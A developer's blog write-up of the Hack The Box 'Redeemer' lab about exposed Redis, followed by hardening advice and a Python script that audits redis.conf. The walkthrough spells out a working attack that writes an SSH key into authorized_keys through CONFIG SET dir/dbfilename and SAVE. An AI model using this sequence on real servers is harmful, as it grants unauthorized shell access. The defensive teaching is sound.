I started Hack The Box to improve my real-world skills, not just follow tutorials. As a Python and Django developer, I wanted to understand how attackers think — especially when it comes to services I use every day, like Redis.
Redeemer was the perfect start. It’s beginner-friendly, focused on Redis, and showed me how a small misconfiguration can open the door to a full system compromise.
What I Learned:
- Redis listens on TCP port 6379 by default
- Many Redis servers are exposed without a password
- Unauthenticated access also means CONFIG access: an attacker can point dir and dbfilename at any path the redis user can write and then call SAVE, so Redis writes a file of the attacker's choosing
- Attackers can use this to plant an SSH key in authorized_keys and gain shell access
Step-by-Step Walkthrough

1. Nmap scan: found port 6379 open
nmap -sV -p-

2. Connect to Redis
redis-cli -h

3. Check write access
I checked whether I could use CONFIG commands:
config get dir
config get dbfilename
Both answered without asking for AUTH, so CONFIG was reachable, and the values told me where Redis would write the dump file when I call SAVE. The real write-permission test is whether SAVE succeeds after pointing dir at the target directory; it fails if the redis user cannot write there.

4. Prepare the SSH key
I added my public key to Redis as a value padded with blank lines on both sides, so the key ends up on a line of its own between the binary RDB header and trailer (sshd skips lines it cannot parse, but a key line with RDB bytes glued onto it is rejected):
set crack "\n\nssh-rsa AAAA... mykey\n\n"
config set dir /home/targetuser/.ssh
config set dbfilename "authorized_keys"
save

5. SSH into the box
ssh targetuser@
Lessons for Developers
If you're using Redis in production, remember this:
- Never expose Redis to the public internet
- Always set a strong password with requirepass: long and random, because redis.conf itself warns that an outsider can try up to a million passwords per second
- Use bind 127.0.0.1 to keep it local, or bind only to the private interface your application servers use
- Restrict access with firewalls or Docker networks
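A static check of redis.conf against the points above, added here as an example and not part of the original post. It goes slightly beyond the list: it also checks protected-mode (default yes since Redis 3.2, which refuses unauthenticated remote clients when no bind address is set) and enable-protected-configs (default no since Redis 7.0, which already blocks CONFIG SET dir and dbfilename), the two settings that decide whether the attack in the walkthrough works at all. The two configs in the block are constructed samples, not files from the box.

```python
"""
Added example (not from the original post): audit a redis.conf for the settings
that make the CONFIG SET dir / SAVE trick possible. WEAK_CONF and HARDENED_CONF
are constructed samples.
"""
from typing import Dict, List

# Addresses that make Redis reachable from every interface.
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::0"}
MIN_PASSWORD_LEN = 16   # redis.conf warns an attacker can try ~1M passwords/s


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """redis.conf is one 'directive arguments' line at a time; only whole-line
    '#' comments exist, and some directives (rename-command, user) repeat,
    so every directive maps to a list of argument strings."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        conf.setdefault(name.lower(), []).append(args.strip())
    return conf


def audit(text: str) -> List[str]:
    """Return one human-readable finding per weak or missing setting; [] is clean."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    binds = conf.get("bind", [""])[-1].split()     # last occurrence wins in Redis
    addrs = {b.lstrip("-") for b in binds}         # Redis 6.2+: '-addr' = optional
    if not addrs or addrs & WILDCARD_BINDS:
        findings.append("bind: listens on all interfaces; use 'bind 127.0.0.1 -::1' "
                        "or the private interface only")

    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("requirepass: not set; anyone who can reach the port is admin")
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass: {len(password)} chars is short for a service "
                        "that answers AUTH attempts at ~1M/s")

    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients are accepted "
                        "even without a bind address")

    if conf.get("enable-protected-configs", ["no"])[-1].lower() == "yes":
        findings.append("enable-protected-configs yes: CONFIG SET dir/dbfilename is "
                        "allowed again, re-enabling the authorized_keys write")

    renamed = any(a.split()[0].upper() == "CONFIG"
                  for a in conf.get("rename-command", []) if a)
    # Coarse ACL check: a user line that drops @dangerous (or config) also blocks it.
    acl_blocked = any("-@dangerous" in a or "-config" in a.lower()
                      for a in conf.get("user", []))
    if not (renamed or acl_blocked):
        findings.append("CONFIG command reachable: add 'rename-command CONFIG \"\"' "
                        "or an ACL with -@dangerous for exposed users")
    return findings


# Constructed sample: roughly the state that makes the Redeemer attack work.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
enable-protected-configs yes
"""

# Constructed sample of the same server after applying the lessons above.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1 -::1
protected-mode yes
requirepass "K7v!pR2#mQ9zL4wX8bN1cT6hJ3yF5dG0"
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        results = audit(text)
        print(f"== {label}: {len(results)} finding(s)")
        for finding in results:
            print("  -", finding)
```

The check reads the file the way Redis does (last occurrence of a directive wins, `#` only starts a comment at the start of a line), so it can run in CI against the config you ship with a Django deployment. Renaming CONFIG is the classic fix; on Redis 6 and later, an ACL that removes `@dangerous` from exposed users is the supported way to get the same effect.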
Final Thoughts:
This challenge changed how I see Redis. I used to think of it only as a helpful cache for Django projects. Now I understand how dangerous it can be if not secured.
Hack The Box is a great way to learn security by doing. If you're a backend dev like me, I highly recommend trying it.